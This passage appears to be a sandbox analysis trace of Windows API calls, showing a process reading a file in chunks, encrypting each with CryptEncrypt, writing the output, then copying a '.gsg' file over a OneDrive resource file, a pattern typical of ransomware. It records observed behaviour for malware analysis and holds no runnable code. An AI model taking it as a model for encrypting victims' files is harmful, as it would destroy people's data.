lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.997] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.998] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.999] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.999] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.000] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.000] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.001] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.001] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.002] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.002] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.003] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0279.003] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0279.003] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0279.004] CloseHandle (hObject=0x5d3c) returned 1 [0279.004] CloseHandle (hObject=0x5d48) returned 1 [0279.004] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.010] SetFileAttributesA 